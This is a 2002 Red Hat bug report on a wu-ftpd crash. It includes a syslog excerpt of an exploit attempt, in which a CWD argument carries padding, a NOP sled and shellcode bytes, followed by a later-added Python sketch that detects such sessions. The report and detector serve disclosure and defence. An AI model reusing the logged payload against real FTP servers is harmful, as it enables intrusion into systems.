Bug 66171 - Security hole in FTPD
Status: CLOSED ERRATA
Product: Red Hat Linux
Classification: Retired
Component: anonftp
Version: 6.2
Hardware: All Linux
Priority: medium
Severity: medium
Assigned To: wdovlrrw
QA Contact: David Lawrence
Keywords: Security

Reported: 2002-06-05 15:07 EDT by Need Real Name
Modified: 2007-04-18 12:42 EDT
Last Closed: 2002-06-05 15:40:57 EDT
Description Need Real Name 2002-06-05 15:07:03 EDT
From Bugzilla Helper:
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461)

Description of problem:
Attached is a fragment of the log file left a few times by some hacker on my PC.


Version-Release number of selected component (if applicable):


How reproducible:
Always

Steps to Reproduce:
See "Additional Info"


Actual Results:  The hacker gains access to the ~ftp directory.  Thank God it's "chroot"ed.

Expected Results:  FTPD should not be crashed that easily.


Additional info:

Jun  4 22:51:34 hypres ftpd[714]: USER ftp
Jun  4 22:51:34 hypres ftpd[714]: PASS mozilla@
Jun  4 22:51:34 hypres ftpd[714]: ANONYMOUS FTP LOGIN FROM a-na25-23.tin.it [212.216.205.22], mozilla@
Jun  4 22:51:35 hypres ftpd[714]: RNFR ././
Jun  4 22:51:59 hypres last message repeated 72 times
Jun  4 22:51:59 hypres ftpd[714]: PWD
Jun  4 22:51:59 hypres ftpd[714]: CWD 
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000PP*P*P*P-
P*P*P*,^E^G^H^X5^H^HP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^L
P^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^L
P^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^L
P^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^LP^L
P^LP^LP^LP^LP^LP^LP^LP^L\220\220\220\220\220\220\220\220\220\220\220
\2201QCT^KtQ^K-
^A^A^A^AP\211Pj^DX\211P1P<\200P^N1QPP&P'P9Yj^CXP<\200P^EP%PP*P*P*
Jun  4 22:52:00 hypres ftpd[714]: CWD /pub/.
Jun  4 22:52:00 hypres ftpd[714]: CWD .
Jun  4 22:52:01 hypres ftpd[714]: RNFR ././././././././.
Jun  4 22:52:01 hypres ftpd[714]: CWD 735073
Jun  4 22:52:01 hypres ftpd[714]: CWD 73507
Jun  4 22:52:02 hypres ftpd[714]: CWD 7350P
Jun  4 22:52:02 hypres ftpd[714]: RNFR .
Jun  4 22:52:02 hypres ftpd[714]: RNFR ./././././././.
Jun  4 22:52:02 hypres ftpd[714]: exiting on signal 11: Segmentation fault
Jun  4 22:52:02 hypres inetd[848]: pid 714: exit status 1
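
A detection sketch for the pattern in the log above, added here as an example and not part of the original bug report or of wu-ftpd: it flags ftpd sessions with overlong command arguments, escaped non-printable bytes, a burst of one repeated command, and a signal 11 exit that follows any of those. The thresholds, the `analyze` function and the sample lines (host `host1`, PIDs 101 and 102) are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# ftpd syslog line as in the report: "<date> <host> ftpd[<pid>]: <message>"
LINE = re.compile(r"^\w{3}\s+\d+ [\d:]{8} \S+ ftpd\[(\d+)\]: (.*)$")
REPEAT = re.compile(r"last message repeated (\d+) times")
CMD = re.compile(r"^([A-Z]{3,4})(?: (.*))?$")
# Control bytes appear in the log as ^X, high bytes as \ooo octal escapes
ESCAPED = re.compile(r"\^[@-_?]|\\[0-3][0-7]{2}")
MAX_ARG = 128     # assumed threshold: ordinary path arguments are far shorter
MAX_REPEAT = 20   # assumed threshold for one command sent back to back

# Constructed sample lines (not taken from the report)
SAMPLE = [
    "Jun  4 10:00:00 host1 ftpd[101]: USER ftp",
    "Jun  4 10:00:01 host1 ftpd[101]: RNFR ././",
    "Jun  4 10:00:09 host1 last message repeated 72 times",
    "Jun  4 10:00:09 host1 ftpd[101]: CWD " + "0" * 200 + "^L" * 8 + "\\220" * 4,
    "Jun  4 10:00:10 host1 ftpd[101]: exiting on signal 11: Segmentation fault",
    "Jun  4 10:00:11 host1 ftpd[102]: USER ftp",
    "Jun  4 10:00:12 host1 ftpd[102]: CWD /pub",
]

def analyze(lines):
    """Return {pid: [finding, ...]} for ftpd sessions that look hostile."""
    findings = defaultdict(list)
    last_pid = None
    for line in lines:
        m = LINE.match(line)
        if not m:
            r = REPEAT.search(line)
            if r and last_pid and int(r.group(1)) > MAX_REPEAT:
                findings[last_pid].append("command burst x" + r.group(1))
            last_pid = None  # a repeat marker only refers to the line before it
            continue
        pid, msg = m.groups()
        last_pid = pid
        c = CMD.match(msg)
        if c and c.group(2):
            verb, arg = c.groups()
            if len(arg) > MAX_ARG:
                findings[pid].append(f"{verb} argument of {len(arg)} chars")
            if ESCAPED.search(arg):
                findings[pid].append(f"{verb} argument with non-printable bytes")
        if "exiting on signal 11" in msg and findings.get(pid):
            findings[pid].append("crash after suspicious input")
    return dict(findings)

if __name__ == "__main__":
    print(analyze(SAMPLE))
```

The escape check is a heuristic: a legitimate file name containing a literal caret sequence would also match, so treat a single hit as a lead and the combination with a crash as the stronger signal.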
Comment 1 Bernhard Rosenkraenzer 2002-06-05 15:10:01 EDT
Did you install all errata packages? This looks a lot like a problem we fixed
some months ago.
Comment 2 Need Real Name 2002-06-05 15:40:51 EDT
Oh, right you are.  I did download the patch for wu-ftpd, but forgot to upgrade 
it.  My fault, sorry.  Thanks a lot!